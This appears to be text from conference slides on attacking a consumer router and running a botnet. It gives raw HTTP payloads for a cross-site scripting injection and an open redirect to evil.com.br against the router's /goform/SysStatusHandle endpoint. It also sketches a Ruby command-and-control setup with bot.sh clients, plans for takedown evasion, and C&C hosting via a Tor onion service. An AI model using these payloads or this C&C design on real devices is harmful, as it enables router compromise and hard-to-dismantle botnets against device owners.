User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Referer: http://192.168.0.1/system_status.asp
Cookie: language=en; admin:language=en

CMD=WAN_CON&GO=system_status.asp&action=;alert(1);

• 21. # cat linkOne_payloads2.txt
Open Redirect
--------------
GET /goform/SysStatusHandle?CMD=&GO=http://www.evil.com.br&action= HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: language=en; admin:language=en
Connection: close

• 22. # man cec
* Command and Control
* Ruby
* Client and Server (cec.rb and bn.rb)
* HTTP
* No frameworks (cgi)
• 23. # man cec - C&C
(diagram: C&C, C&C client and bot.sh, with the arrows labelled "commands" and "5s")

• 25. # cat next_steps.txt
* Fix bugs
* Code refactor
* More features
* Cryptography
* Clients to ARM / MIPS / etc...
* TakeDown Evasion

• 26. # man tor2web
* https://www.tor2web.org/
“Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser”
* replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct
Anonymity for the server
• eqt5g4fuenphqinx.onion
• End-to-end encryption